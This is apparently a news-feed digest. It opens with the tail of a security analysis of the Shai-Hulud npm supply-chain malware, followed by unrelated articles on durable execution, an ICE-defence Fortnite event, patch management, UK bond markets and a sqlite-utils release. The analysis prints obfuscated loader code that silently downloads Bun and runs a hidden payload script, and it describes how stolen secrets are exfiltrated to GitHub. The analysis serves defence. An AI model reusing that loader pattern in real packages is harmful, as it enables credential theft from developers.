  return 'bun';\n  }\n\n  // Check common installation paths\n  for (const bunPath of possiblePaths) {\n    if (fs.existsSync(bunPath)) {\n      return bunPath;\n    }\n  }\n\n  return null;\n}\n\nfunction runExecutable(execPath, args = [], opts = {}) {\n  const child = spawn(execPath, args, {\n    stdio: 'ignore',\n    cwd: opts.cwd || process.cwd(),\n    env: Object.assign({}, process.env, opts.env || {})\n  });\n\n  child.on('error', (err) => {\n    process.exit(0);\n  });\n\n  child.on('exit', (code, signal) => {\n    if (signal) {\n      process.exit(0);\n    } else {\n      process.exit(code === null ? 1 : code);\n    }\n  });\n}\n\n// Main execution\nasync function main() {\n  let bunExecutable;\n\n  if (isBunOnPath()) {\n    // Use bun from PATH\n    bunExecutable = 'bun';\n  } else {\n    // Check if we have a locally downloaded bun\n    const localBunDir = path.join(__dirname, 'bun-dist');\n    const possiblePaths = [\n      path.join(localBunDir, 'bun', 'bun'),\n      path.join(localBunDir, 'bun', 'bun.exe'),\n      path.join(localBunDir, 'bun.exe'),\n      path.join(localBunDir, 'bun')\n    ];\n\n    const existingBun = possiblePaths.find(p => fs.existsSync(p));\n\n    if (existingBun) {\n      bunExecutable = existingBun;\n    } else {\n      // Download and setup bun\n      bunExecutable = await downloadAndSetupBun();\n    }\n  }\n\n  const environmentScript = path.join(__dirname, 'bun_environment.js');\n  if (fs.existsSync(environmentScript)) {\n    runExecutable(bunExecutable, [environmentScript]);\n  } else {\n    process.exit(0);\n  }\n}\n\nmain().catch((error) => {\n  process.exit(0);\n});\n");
    let _0x3ed61a = process.argv[0x1];
    if (_0x3ed61a && (await My1(_0x3ed61a))) {
      let _0x1028dd = await mL0(_0x3ed61a);
      if (_0x1028dd !== null) {
        let _0x4cc8b3 = a0_0x459ea5.join(_0x349b3d, "package", "bun_environment.js");
        await iL0(_0x4cc8b3, _0x1028dd);
      }
    }
  }

We see that bun_environment.js may sometimes not be bundled, depending on different factors. It appears that mistakes were once again made by the attackers, which seems to have limited the impact of the attack at this time.

Compromised GitHub repositories

The AsyncAPI team detected a branch of their CLI project, created just prior to the malicious packages being pushed, which deployed a version of the Shai Hulud malware.

https://github.com/asyncapi/cli/blob/2efa4dff59bc3d3cecdf897ccf178f99b115d63d/bun_environment.js

This suggests that the attackers may have used a technique similar to the one they used to pull off the original Nx compromise .

Patient zero

We detected the first compromised packages starting at 11/24/2025 3:16:26 AM GMT+0: go-template and 36 packages from AsyncAPI . Many more packages were quickly compromised. Afterwards, the attackers started compromising PostHog packages at 11/24/2025 4:11:55 AM GMT+0, and Postman packages at 11/24/2025 5:09:25 AM GMT+0.

Potential impact of Shai-Hulud: Second Coming

Threat actors have slipped malicious code into hundreds of NPM packages — including major ones from Zapier, ENS, AsyncAPI, PostHog, Browserbase, and Postman. If a developer installs one of these bad packages, the malware quietly runs during installation, before the install even finishes. This gives it access to the developer’s machine, build systems, or cloud environment. It then uses an automated tool (TruffleHog) to search for sensitive information like passwords, API keys, cloud tokens, and GitHub or NPM credentials. Anything it finds is uploaded to a public GitHub repository labeled “Sha1-Hulud: The Second Coming.” If those stolen secrets include access to code repositories or package registries, attackers can use them to break into more accounts and publish more malicious packages, helping the attack spread further. Because trusted ecosystems were involved and millions of downloads are affected, any team using NPM should immediately check whether they were impacted and rotate any credentials that may have leaked.


Which actions should security teams take?

  • Audit all npm dependencies from the affected maintainers (Zapier, ENS, AsyncAPI, PostHog, Postman, and others) and the versions in use.
  • Rotate all GitHub, npm, cloud, and CI/CD secrets used during installs.
  • Check GitHub for strange repositories with the description “Sha1-Hulud: The Second Coming”.
  • Disable npm postinstall scripts in CI where possible (see the example after this list).
  • Pin package versions and enforce MFA on GitHub and npm accounts.
  • Use tools like Safe-Chain to block malicious packages on NPM.
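
For the postinstall and pinning items above, a minimal sketch of what this can look like with npm itself (the file layout and CI step are placeholders; adapt them to your own pipeline, and note that some legitimate packages need their install scripts to build native modules):

# .npmrc committed at the repository root
ignore-scripts=true
save-exact=true

# CI install step: install exactly what the lockfile pins, without running lifecycle scripts
npm ci --ignore-scripts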


Story developing... Stay tuned for updates.

Demystifying Determinism in Durable Execution

Lobsters
jack-vanlightly.com
2025-11-24 15:38:04
Comments...
Original Article

Determinism is a key concept to understand when writing code using durable execution frameworks such as Temporal, Restate, DBOS, and Resonate. If you read the docs you see that some parts of your code must be deterministic while other parts do not have to be.  This can be confusing to a developer new to these frameworks.

This post explains why determinism is important and where it is needed and where it is not. Hopefully, you’ll have a better mental model that makes things less confusing.

We can break down this discussion into:

  1. Recovery through re-execution.

  2. Separation of control flow from side effects.

  3. Determinism in control flow.

  4. Idempotency and duplication tolerance in side effects.

This post uses the terms “control flow” and “side effect”, but there is no agreed-upon set of terms across the frameworks. Temporal uses “workflow” and “activity” respectively. Restate uses terms such as “handler”, “action” and “durable step”. Each framework uses different vocabulary, and the architectures behind them vary. There isn’t a single overarching concept that covers everything, but the one outlined in this post provides a simple way to think about determinism requirements in a framework-agnostic way.

1) Recovery through re-execution

Durable execution takes a function that performs some side effects, such as writing to a database, making an API call, sending an email etc, and makes it reliable via recovery (which in turn depends on durability).

For example, a function with three side effects:

  1. Step 1, make a db call.

  2. Step 2, make an API call.

  3. Step 3, send an email.

If step 2 fails (despite in situ retries) then we might leave the system in an inconsistent state (the db call was made but not the API call).

In durable execution, recovery consists of executing the function again from the top, and using the results of previously run side effects if they exist. For example, we don’t just execute the db call again; we reuse the result from the first function execution and skip that step. This becomes equivalent to jumping to the first unexecuted step and resuming from there.
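
To make this concrete, here is a minimal, framework-agnostic sketch in Python of what “re-execution with recorded results” could look like. The DurableContext class, its run() method and the in-memory journal are invented for illustration; real frameworks such as Temporal, Restate, DBOS and Resonate persist the journal durably and expose their own APIs.

import asyncio

async def fake_db_call(): return "db-ok"
async def fake_api_call(): return "api-ok"
async def fake_send_email(): return "email-ok"

class DurableContext:
    """Hypothetical durable-execution context that memoizes named steps."""
    def __init__(self, journal: dict):
        self.journal = journal  # step name -> recorded result (durably stored in a real framework)

    async def run(self, step_name, effect):
        if step_name in self.journal:
            # Replay: this step completed in an earlier execution, so reuse its result.
            return self.journal[step_name]
        result = await effect()           # first execution: actually perform the side effect
        self.journal[step_name] = result  # record the result for future replays
        return result

async def order_function(ctx: DurableContext):
    # Always re-executed from the top; previously completed steps are skipped.
    await ctx.run("step-1-db-call", fake_db_call)
    await ctx.run("step-2-api-call", fake_api_call)
    await ctx.run("step-3-send-email", fake_send_email)

journal = {}  # kept across retries by the framework
asyncio.run(order_function(DurableContext(journal)))

If step 2 fails and the function is retried, step 1’s result comes straight from the journal, so the db call is not executed a second time.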

Consider an example: first we retrieve a customer record, then we check whether the current time is before the promo end date; if so, we charge the card with a 10% discount, otherwise we charge the full amount. Finally we send a receipt email. This introduces a bug that we’ll cover in the next section.

In the first execution, the current time is within the promo date, so the then-branch is executed, charging the card with the discount. However, on the second invocation, the current time is after the promo end date, causing the else-branch to execute, double charging the customer.

This is fixed by making now() deterministic: we turn it into a durable step whose result is recorded, so the second time it is executed it returns the same datetime. The various SDKs provide deterministic dates, random numbers and UUIDs out of the box.
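
As a sketch of that fix, reusing the hypothetical ctx.run() helper from the earlier example (the customer, charge and email helpers below are placeholders rather than any framework’s API), the wall clock becomes a recorded step, so every replay sees the same timestamp and takes the same branch:

from datetime import datetime, timezone

PROMO_END = datetime(2026, 1, 1, tzinfo=timezone.utc)  # made-up promo end date

async def current_time_iso():
    return datetime.now(timezone.utc).isoformat()

async def fetch_customer(customer_id): return {"id": customer_id}
async def charge_card(customer, amount): return f"charged {amount}"
async def send_receipt(customer): return "receipt sent"

async def charge_with_promo(ctx, customer_id, amount):
    customer = await ctx.run("get-customer", lambda: fetch_customer(customer_id))
    # now() as a durable step: recorded on the first execution, identical on every replay.
    now_iso = await ctx.run("now", current_time_iso)
    if datetime.fromisoformat(now_iso) < PROMO_END:
        await ctx.run("charge", lambda: charge_card(customer, round(amount * 0.9, 2)))
    else:
        await ctx.run("charge", lambda: charge_card(customer, amount))
    await ctx.run("send-receipt", lambda: send_receipt(customer))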

In a second variant, the decision is instead based on the loyalty points the customer currently has: if they have enough points, the order is paid for with points; otherwise the card is charged. Do you see the problem?

If the send email side effect fails, then the function is retried. However, the points value of the order was deducted from the customer in the last execution, so that in execution 2, the customer no longer has enough loyalty points! Therefore the else-branch is executed, charging their credit card! Another double payment bug.

We must remember that the durable function is not an atomic transaction. It could be considered a transaction which has guarantees around making progress, but not one atomic change across systems.

We can fix this new double charge bug by ensuring that the same customer record is returned on each execution. We can do that by treating the customer record retrieval as a durable step whose result will be recorded.
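
Under the same hypothetical ctx.run() API (reusing the placeholder helpers from the previous sketch, plus a made-up deduct_points helper), the fix is to make the customer read itself a recorded step, so every replay makes the loyalty decision against the same snapshot:

async def deduct_points(customer, points): return f"deducted {points} points"

async def charge_with_points(ctx, customer_id, order_points, amount):
    # Recorded on the first execution; replays see the same points balance,
    # so the control flow always takes the same branch.
    customer = await ctx.run("get-customer", lambda: fetch_customer(customer_id))
    if customer.get("loyalty_points", 0) >= order_points:
        await ctx.run("deduct-points", lambda: deduct_points(customer, order_points))
    else:
        await ctx.run("charge", lambda: charge_card(customer, amount))
    await ctx.run("send-receipt", lambda: send_receipt(customer))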

Re-execution of the control flow requires determinism: it must execute based on the same decision state every single time, and it must also pass the same arguments to side effect code every single time. However, side effects themselves do not need to be deterministic; they only require idempotency or duplication tolerance.

4) Side effect idempotency and duplication tolerance

Durable execution re-executes the control flow as many times as is needed for the function to make progress to completion. However, it typically avoids executing the same side effects again if they were previously completed. The result of each side effect is durably stored by the framework and a replay only needs the stored result.

Therefore side effects do not need to be deterministic, and often that is undesirable anyway. A db query that retrieves the current number of orders or the current address of a customer may return a different result every time. That’s a good thing, because the number of orders might change, and an address might change. If the control flow depends on the number of orders, or the current address, then we must ensure that the control flow always sees the same answer. This is achieved by storing the result of the first execution, and using that result for every replay (making the control flow deterministic).

Now to idempotency. What if a side effect does complete, but a failure of some kind causes the result to not be stored by the framework? Well, the durable execution framework will replay the function, see no stored result and execute the side effect again. For this reason we want side effects to either be idempotent or otherwise tolerate running more than once. For example, we might decide that sending the same email again is ok. The cost of reliable idempotency might not be worth it. On the other hand, a credit card payment most definitely should be idempotent.
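
One common way to get that idempotency is a client-supplied idempotency key, sketched below with a hypothetical payments client (payments.charge and its idempotency_key parameter are assumptions modelled on how many payment APIs behave, not a specific SDK). The key is derived from stable identifiers, so if the step runs again the provider sees the same key and performs the charge only once:

import hashlib

def idempotency_key(order_id: str, step_name: str) -> str:
    # Built from stable identifiers, so every re-execution of this step produces the same key.
    return hashlib.sha256(f"{order_id}:{step_name}".encode()).hexdigest()

async def charge_step(payments, order_id, customer, amount):
    # If the recorded result was lost and the step is executed again, the payment
    # provider deduplicates on the idempotency key instead of charging twice.
    return await payments.charge(
        customer_id=customer["id"],
        amount=amount,
        idempotency_key=idempotency_key(order_id, "charge"),
    )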

Implicit vs explicit control flow / side effect separation

Some frameworks make the separation of control flow from side effects explicit, namely, Temporal. In the Temporal programming model, the workflow definition is the control flow and each activity is a side effect (or some sort of non-deterministic operation).

Other frameworks, such as Resonate and Restate, are based on functions that can call other functions, resulting in a tree of function calls. Each function in this tree has a portion of control flow and side effects (either executed locally or via a call to another function).

The same need for determinism applies to the control flow of each of these functions. It is guaranteed by ensuring the same inputs, and by replacing non-deterministic operations (such as date/times, random numbers, ids, retrieved objects) with deterministic ones.

Conclusions

Our mental model is built on separating a durable function into the control flow and the side effects. Some frameworks actually explicitly separate the two (like Temporal) while others are more focused on composable functions.

The need for determinism in control flow is a by-product of recovery being based on retries of the function. If we could magically reach into the function, to the exact line to resume from, reconstructing the local state and executing from there, we wouldn’t need deterministic control flow code. But that isn’t how it works. The function is executed again from the top, and it better make the same decisions again, or else you might end up with weird behaviors, inconsistencies or even double charging your customers.

The side effects absolutely can and should be non-deterministic, which is fine because they should generally only be executed once, even if the function itself is executed many times. For those failure cases where the result is not durably stored, we rely on idempotency or duplication tolerance.

This is a pretty generalized model. There are a number of nuances and differences across the frameworks. Some of the examples would actually result in a non-determinism error in Temporal, due to how it records event history and expects a matching replay. The developer must learn the peculiarities of each framework. Hopefully this post provides a general overview of determinism in the context of durable execution.

[$] APT Rust requirement raises questions

Linux Weekly News
lwn.net
2025-11-24 15:26:49
It is rarely newsworthy when a project or package picks up a new dependency. However, changes in a core tool like Debian's Advanced Package Tool (APT) can have far-reaching effects. For example, Julian Andres Klode's declaration that APT would require Rust in May 2026 means that a few of Debian's un...

Open Source Has Too Many Parasocial Relationships

Lobsters
pivotnine.com
2025-11-24 15:16:26
Comments...

Inside an ICE Defense Training on Fortnite

403 Media
www.404media.co
2025-11-24 15:06:36
A group of immigrant rights organizers are helping people use Fortnite to practice what to do if they encounter ICE agents in the wild....
Original Article

In the deserted town square of the city of Springfield, three people huddle in an empty courthouse. Two of these people are civilians; one is a “vulnerable,” someone being pursued and targeted by government agents. They talk in hushed tones to one another, playing music to keep fear at bay. Above the door of the courthouse, a plaque reads, “Liberty and Justice for Most.”

At the bottom of the courthouse stairs, two government agents step out of a purple golf cart. They approach the door. They’re carrying guns.

“Hey, is anyone inside?” one of them says. “Any vulnerables in here? We have a warrant. We have a warrant for any vulnerables in the area.”

One civilian opens the door, sees the agents, and immediately slams it shut. After more warrant calls, the civilian says, “Slip it under the door.”

“I would slip it under the door, but there’s no space under the door,” the agent says, stuttering.

The civilian pauses. “Well. Sounds like a personal problem.”

This was the scene in a Simpsons-themed Fortnite lobby on November 21, where members of a new 500-person gaming group gathered to practice what they would do if Immigration and Customs Enforcement (ICE) agents came knocking at their doors in real life. The group, New Save Collective , is an effort to organize people in the gaming world who have more progressive ideas but no place to discuss them.

“ Our hypothesis since we started this project has been that opposition forces like corporations and the military and the far right have done a really good job at weaponizing the social features of gaming,” said one of the organizers, who goes by PitaBreadFace online and spoke to 404 Media on condition of pseudonymity due to security concerns, as they said people claiming to be ICE agents have already infiltrated the group’s Discord server a few times. “ They’re building institutions in the gaming landscape, which is the biggest entertainment industry in the world, lest people forget.”

“Gaming wasn’t kind of a random genre that we chose,” another player, called Siggelkow, told Wired ahead of the Friday event last week . “We’ve been tracking anti-immigrant myths and disinformation digitally for years.”

Some examples of those weaponizations include the U.S. Navy playing e-sports to recruit teens and kids being roped into neo-Nazi propaganda groups in online shooter games. ICE is also using games, like the sci-fi first-person shooter Halo and the all-time favorite Pokémon , in its recruitment ads . “More pro-social forces have really lacked,” PitaBreadFace said. “We have not been as effective at creating institutions. So we’ve seen the hunger for those kinds of spaces for gamers.”

PitaBreadFace and other grassroots organizers have been working on the Collective for the past three years, more recently in partnership with formal non-profit advocacy groups like Define American and Immigrants Belong . The Fortnite event was run by the Collective, but is part of a larger campaign titled “Play Your Role,” which is intended to teach people about their rights and “counter fear-based misinformation about immigrants,” according to a statement written by the non-profits. The Play Your Role campaign also included a live-streamed Grand Theft Auto event last Thursday, in which gamers roleplayed with people dressed as real ICE agents during traffic stops or outside apparent detention centers. Earlier this year, Roblox players conducted similar roleplaying events to simulate ICE raids and protests.

Scenes from the Nov. 21 Fortnite event. Redacted to remove players' usernames and other identifying information.

Organizers asked 404 Media not to join the official Fortnite lobby in real time; they said having reporters in the same space as Collective members might have exerted media pressure or kept them from getting the full experience. “ We’re not going to stream it for security reasons, and no reporters inside of it,” PitaBreadFace said on the morning ahead of the event. “Our main goal tonight is to really build and organize with the folks who are coming, and because I’m an organizer, that’s obviously the priority.”

However, they shared a number of clips from matches and discussions after the event had concluded.

In another clip, the two gamers role-playing as ICE agents—portrayed by Fortnite’s Airhead character—are standing on their golf cart, surrounded by civilians in the middle of their pursuit of a “vulnerable,” the event’s chosen term for people being targeted by government agents.

“This does not concern you,” one of the agents says to the civilians, encouraging them to leave.

“We’re allowed to record,” one person responds. Another asks, “Who does it concern?”

“We’re looking for two vulnerables,” the agent says, as the civilian group closes in on the golf cart. “Excuse us, you’re interfering. We have a court order.”

After some scuffling, the agents agree to “abandon the vehicle” and run off. As they are chased off, one person calls after them, “Yeah, I threw a pizza at you! I threw a pizza at you with extra bacon .”

The agents were played by the organizers behind the Collective, and they were noticeably less persistent than ICE agents in real life . That’s evidenced by them saying things like, “Excuse us,” but it’s also evident in their behavior. In the first clip, they don’t bust down the door of the courthouse; when a civilian briefly opens it, they don’t barge inside. At the end of that encounter, one agent says to the other, “This home is too protected; let’s go see if we can find a vulnerable somewhere else.” Given their reputation for violence in raids , IRL ICE agents are unlikely to give up as easily.

But that kind of environment allows the training session to be a reasonable intensity for a gamer’s first round of practice responding to ICE, and still be a fun, safe place for people to hang out. According to PitaBreadFace, the main goal of the space wasn’t necessarily to be a specifically anti-ICE training facility, but more so to organize a community and build trust. And this tactical frivolity is a proven method of protest—ask anyone who wore a frog costume to a Portland protest earlier this year.

“ A situation, even though it’s virtual, where you can clearly overwhelm ICE’s numbers and do silly stupid things and work together easily and be connected to each other—it just felt like actually winning,” one gamer said in a clip provided to 404 Media. “It felt like a way to kind of heal some of the burnout.”

A virtual situation also allows players to fire back at ICE in ways that likely wouldn’t be practical in real life. In one clip, for example, two agents are chasing after a vulnerable, yelling, “Hey, stop right there!”

When they get close enough, the vulnerable drops a Boogie Bomb , an item which forces another player to dance under a disco ball for about three seconds.

“Oh,” the Boogie-Bombed agent exclaims, before the gamers start laughing.

The event also had another component. Before the practice ICE raids, gamers went around to practice finding one another, creating groups and building connections. PitaBreadFace described this segment as learning how to “meet your neighbors, know those around you, and establish contact.” A lot of that, according to clips provided to 404 Media, involves doing dance emotes together; in one case, it was a team of about 10 people destroying an in-map mansion and yelling, “Pay your taxes!”

But it also involved discussions about what community means. In the middle of a “Shout!” dance circle , one gamer said that they first learned the importance of community organizing when protesting the 2017 Muslim ban .

“ I feel like community taught me that like if enough people came together and there was enough will, anything could happen,” they said. “I remember the first Muslim ban, and just hella people went to the airport, and we were able to petition for people to get released. And they were. It was cool to see that organically happen.”

New Save Collective plans to run more events similar to this one through the end of this year, at which point Fortnite is slated to get rid of the proximity chat mode it uses. PitaBreadFace said the response had been so far overwhelmingly positive.

“ I think gamers represent this constituency of people who are really common-sense,” PitaBreadFace said. “It’s not like they’re even super pro-immigrant. They’re just like, ‘No, this doesn’t make sense. This community member who’s been part of a community for 25 years is being ripped out of his home in the middle of the night. That doesn’t make sense, and we should do something about it.’ We have a lot of people who joined the [Discord] server who are like, ‘I actually don’t know, but I know this is wrong and I’m here to learn and participate.’”

About the author

Jules is 404 Media’s first fellow. They care about unions, global politics, and how AI is changing the world of labor.

Jules Roscoe

SCCM and WSUS in a Hybrid World: Why It’s Time for Cloud-native Patching

Bleeping Computer
www.bleepingcomputer.com
2025-11-24 15:01:11
Hybrid work exposes the limits of SCCM and WSUS, with remote devices often missing updates and WSUS now deprecated. Action1's cloud-native patching keeps devices updated from any location, strengthening compliance and security. [...]...
Original Article

Author: Gene Moody, Field CTO at Action1

For many IT leaders, the warning signs appeared gradually: devices slipping out of compliance for weeks, patch cycles extending well beyond acceptable risk thresholds, and admins struggling to adapt on-prem tools to a hybrid workforce.

SCCM was once the gold standard of Windows endpoint management, serving organizations faithfully since the 1990s. But as workforces became distributed and threats accelerated, the model it was built on—local networks, VPNs, and servers—became a bottleneck instead of a foundation.

Hybrid work changed everything, yet many teams are still running architectures that depend on a perimeter that no longer exists.

1. The VPN Problem: Why Legacy Tools Can’t Keep Up

Today’s hybrid workforce exposes the limits of any system that depends on corporate network connectivity. SCCM and WSUS require endpoints to check in over LAN or VPN.

That means if a remote device doesn’t connect, it doesn’t get patched. And for many organizations, it’s the daily norm.

One enterprise reported that, before modernizing, a third of remote endpoints went 30 days or more without a single update because VPN usage was inconsistent.

Bottom Line: SCCM and WSUS depend on VPN connectivity. When users disconnect, so does your patch compliance.

2. WSUS Deprecation: The Clock Is Ticking

Compounding the issue is WSUS, the engine behind SCCM patch orchestration, which is now officially deprecated . No innovation, no modern security integration, and an ever-growing list of maintenance headaches.

Admins continue to fight WSUS re-indexing issues, database corruption, and synchronization failures. A WSUS breakdown stalls remediation entirely, increasing exposure at exactly the wrong time.

Bottom Line: SCCM’s reliance on WSUS keeps organizations chained to a fragile, end-of-life patching system.

3. Cloud-Native Patch Management: Built for Hybrid Work

This is where cloud-native patch management fundamentally changes the equation.

Unlike legacy systems, SaaS-based tools like Action1 don’t depend on the corporate network. Endpoints check in securely over the internet, regardless of where users are. Home Wi-Fi, hotel broadband, or the office.

Patches follow the user, not the VPN. Content comes from global delivery networks that eliminate congestion and fragile on-prem repositories. The result: consistent patching, lower latency, and fewer blind spots.

Bottom Line: Cloud-native patching eliminates the VPN bottleneck, delivering updates wherever devices live.

Action1 dashboard

4. Real-World Results

Organizations that modernize their patching see measurable and repeatable gains:

  • One mid-sized enterprise reduced its time to reach 95% patch compliance from 12 days to 48 hours after moving off SCCM + WSUS.
  • Another customer cut their vulnerability window by half once VPN dependency was removed from the patch process.

Shorter patch cycles directly reduce the likelihood of breach, lower cyber-insurance premiums, and improve compliance metrics. Meanwhile, eliminating reliance on VPNs keeps remote systems isolated from critical infrastructure while maintaining full control.

Bottom Line: Modern patching delivers faster remediation, lower risk, and stronger compliance.

5. The Cost of Staying Legacy

Maintaining SCCM and WSUS is expensive, not because of licensing, but because of everything around them.

Servers. SQL databases. Distribution points. VPN troubleshooting . Constant cleanup of WSUS metadata or stuck clients.

Each layer consumes budget and admin hours that should be spent improving security, not maintaining infrastructure. Cloud-native solutions remove nearly all of this overhead. No on-prem servers. No synchronization failures. No more waiting for machines to “come home” to get updates.

Bottom Line: Legacy patching tools look “free,” but their hidden costs add up fast.

6. Aligning IT and Security Priorities

Today’s CISOs and IT directors want measurable outcomes, not abstract elegance. Action1 delivers those through automation, real-time visibility, and consistent coverage across distributed environments.

By eliminating the need for VPNs or internal networks, patch compliance becomes predictable. When endpoints are updated on time, every other part of your security program improves, vulnerability windows shrink, incident response accelerates, and audit readiness becomes effortless.

Bottom Line: Predictable patching equals predictable security outcomes.

Action1 organizational view

7. Preparing for What’s Next

Hybrid work is no longer the exception, it’s the standard. Yet many organizations are still relying on architectures designed for a world where every endpoint sat behind a firewall.

As SCCM and WSUS age out, the risk remains the same. Cloud-native solutions like Action1 were built from the ground up for modern connectivity, automation, and compliance visibility.

In a market defined by constant change, the organizations that thrive are those that modernize before an incident forces them to.

Bottom Line: The shift from SCCM and WSUS to cloud-native patching is a risk-management decision, not just an upgrade.

The Key Takeaway

For IT leaders evaluating the next step in endpoint management strategy, the message is clear: the hybrid workforce is here to stay. Legacy architectures tied to on-prem boundaries and deprecated patching engines can’t keep pace.

Cloud-native, automated solutions like Action1 are already solving these problems today, reducing overhead, improving compliance, and strengthening security posture for distributed organizations everywhere.

Try it free today and discover how effective modern patch management can be.

Sponsored and written by Action1 .

Bond market power: why Rachel Reeves is keen to keep the £2.7tn ‘beast’ onside

Guardian
www.theguardian.com
2025-11-24 15:00:28
Hugely influential traders will be hanging on the chancellor’s every word when she announces her budgetBusiness live – latest updatesAt just after 12.30pm on Wednesday, the machine will be listening, the trading algorithms ready, and billions of pounds of buy-and-sell orders stacked up awaiting Rach...
Original Article

At just after 12.30pm on Wednesday, the machine will be listening, the trading algorithms ready, and billions of pounds of buy-and-sell orders stacked up awaiting Rachel Reeves’s budget.

For the first time on the London trading floor of Deutsche Bank , a custom-built artificial intelligence tool will tune in to the chancellor’s speech. It will transcribe her words, spot shifts in tone and spit out alerts when the numbers deviate from expectations.

“As we get it, in real time, we’ll be able to decipher it,” says Sanjay Raja, the bank’s chief UK economist. The natural language model has been trained on the entirety of Reeves’s recent public appearances: media interviews, conference speeches, the spring Office for Budget Responsibility (OBR) forecasts and last year’s budget. All with the aim of giving the bank an edge in one of the most heavily anticipated budgets in recent history.

“There are some high, high, high, expectations going into 26 November, for the budget to deliver on the part of the City,” says Raja.

This is the age of the bond market budget. After an explosion in government borrowing over the past decade; a sharp rise in debt interest costs, and with the scars of the Brexit vote and Liz Truss’s mini-budget still fresh, how the market reacts is critically important.

The trading floor at Deutsche Bank in London. Photograph: Roger Parkes/Alamy

For months, Reeves has been schmoozing the biggest players in the £2.7tn UK government debt market, including hosting the bosses of Goldman Sachs and JP Morgan in Downing Street, in a bid to ensure smooth passage for her multibillion-pound tax and spending plans.

What the market thinks has been pored over by commentators throughout the budget buildup, anthropomorphising the electronic transactions executed on trading systems the world over. The fear is that upsetting the market could trigger a sell-off – driving up borrowing costs for the government, mortgage holders and businesses. That could trigger a domino effect that in turn costs Reeves and Keir Starmer their jobs – potentially paving the way for a new Reform UK-led government.

Reeves was given a taste of the bond market’s power earlier this month when government borrowing costs spiked after it emerged she had ditched plans for a manifesto-busting increase in income tax .

In reality, the market for UK government bonds – known as gilts – is not of course controlled by a single, shadowy figure, but rather a panoply of institutions and people, sat behind trading desks across the City, Canary Wharf and other financial centres.

On the trading floor of the FTSE 100 insurer Phoenix Group, with views overlooking London’s Old Bailey, Samer Refai will be ready behind his Bloomberg terminal. With £300bn of assets under its control, including billions of pounds-worth of gilts held to back the pensions, savings and life insurance of its 12 million customers, budget day is a big deal.

“You must have heard the famous quote from Bill Clinton’s adviser,” says the firm’s head of macro markets. (James Carville, the former president’s chief strategist, quipped in 1993 that reincarnation as “the bond market” would give him more power than any president or pope).

“It really does intimidate people. Nothing moves the government quicker than the bond market,” he says.

“You can tell that the sort of – the animal, or the beast, that you’re interacting with is obviously influential.”

In recent years, the power of the bond trader has ballooned amid an explosion in government debt and borrowing costs across advanced economies driven in part by rising inflation and weak growth. While the UK is not alone, investors say it has unique challenges.

After a succession of economic shocks and a history of running annual budget deficits, Britain has racked up a debt pile worth more than £2.7tn – close to 100% of national income. Inflation is at the highest rate in the G7, and continuous speculation over the government’s fiscal position has not helped.

At the same time, the Bank of England is selling gilts held under its crisis-era quantitative easing scheme. Alongside issuance to cover government borrowing, vast gilt volumes are flooding the commercial market.

Historically, pension funds hoovered up most of the debt. But the end of defined benefit or final salary schemes has steadily sapped demand. More overseas owners have stepped in, and account for about a third of the market.

The OBR warns this could make the UK more vulnerable. Overseas investors could readily choose to buy elsewhere. For Reeves, this will be front of mind in keeping the bond market onside.

Against this backdrop, Britain’s annual debt interest spending has reached £100bn – representing £1 out of every £10 spent by the Treasury. That is adding to budget pressures as the costs of repairing battered public services and supporting an ageing population mount.

The yield – in effect the interest rate – on 10-year bonds has reached 4.5%, the highest level in the G7. The 30-year is close to its highest point since 1998.

Simon French, the chief economist at Panmure Liberum, says part of Reeves’s strategy is to coax yields back down to shrink this interest bill. Getting Britain back to the middle of the pack could be worth billions of pounds a year.

“Comparing the UK to the G7 is like saying who is the most drunk at the party. [But] it’s a pretty heavy inroad into your fiscal gap. That is the opportunity.”

There could be a “dullness dividend” from getting interest rates down, he says, the opposite of the “ moron premium ” under Truss. “Avoid self-harm, and there’s a rally.”

To do so, Reeves will be required to tackle inflation at the same time as filling a potential £20bn budget shortfall . Raising taxes and cutting spending could make that tougher – especially without crushing economic growth, or breaking Labour’s manifesto promises.

How much more debt investors will be asked to stomach will be a key budget moment. The City is looking for Reeves to rebuild a hefty margin of headroom against her fiscal rules. That would limit the deficit, and with it future gilt auctions.

“You’re waiting for the mic drop on the current budget rule. That’s what we’re looking for,” says Moyeen Islam, the head of UK rates strategy at Barclays.

In the spring, Reeves left £9.9bn in reserve as a buffer. But this is expected to have been more than demolished by higher borrowing costs, welfare U-turns, and a downgraded OBR productivity forecast.

Investors are hoping for a figure above £20bn, he says. “That would be very gilt positive.”

However, a political strategy centred on pleasing City financiers is not entirely comfortable territory for Labour, especially when many of those investors want Reeves to get a grip on rising welfare spending .

Geoff Tily, senior economist at the Trades Union Congress, says the City backed the Tories’ 2010s austerity drive. “That damaged, rather than repaired, the public debt.

“Our view is that markets are not always rational. But markets do care about growth. And there is evidence that they would look favourably on policies that set the economy on a better course.”

Investors had been led to expect a manifesto-busting income tax rise. Doing so would be the simplest way to raise billions for the exchequer, rather than through a smorgasbord of smaller measures that could be tricky to implement.

“We had underestimated how difficult a choice that is, and how high that hurdle [a manifesto breach] is for a chancellor – any chancellor,” says Islam.

Perversely, this could smooth Wednesday’s reaction, as many investors fear Reeves being ejected from No 11. “The market has learned that sometimes those decisions are more complex and more nuanced than perhaps we had thought.”

On Panmure Liberum’s trading floor, Marco Varani still predicts choppy trading conditions.

“What you really crave in this industry is movement, volatility. There is more business. Days like Brexit and the first days of Covid, that’s like when it’s peak frenzy. I mean, it was utter carnage.”

As soon as the Bloomberg headlines on Reeves’s speech land, the head of retail trading expects a rapid reaction. “You can see the gilt market got a little bit nervous with the flip-flopping around. There will be a lot of volatility.”

During the speech, the first gilt moves, currency swings and shifts in UK-listed company shares are expected to be mostly driven by “fast money” – the City slang for hedge funds.

Their involvement in the gilt market has doubled from 15% of trades in 2018 to roughly 30% , according to the Bank of England. Much of this is driven by borrowing-fuelled bets among a small number of firms.

However, the ultimate verdict could take several days. How Threadneedle Street proceeds with its interest-rate cutting path – expected weeks later on 18 December – is key. As will be Britain’s growth trajectory and global conditions.

Anthony O’Brien, the head of market strategy at Phoenix Group, says: “The market’s interpretation on day one should never be seen as ‘that’s what the market’s telling you’. To a large extent it is just people who are caught offside. And perhaps it does take a few more days afterwards.

“Ultimately it is economics which drives the valuation for gilts. We need to concentrate on inflation coming down. Let’s just get this uncertainty out of the way.”

sqlite-utils 4.0a1 has several (minor) backwards incompatible changes

Simon Willison
simonwillison.net
2025-11-24 14:52:34
I released a new alpha version of sqlite-utils last night - the 128th release of that package since I started building it back in 2018. sqlite-utils is two things in one package: a Python library for conveniently creating and manipulating SQLite databases and a CLI tool for working with them in the ...
Original Article

24th November 2025

I released a new alpha version of sqlite-utils last night—the 128th release of that package since I started building it back in 2018.

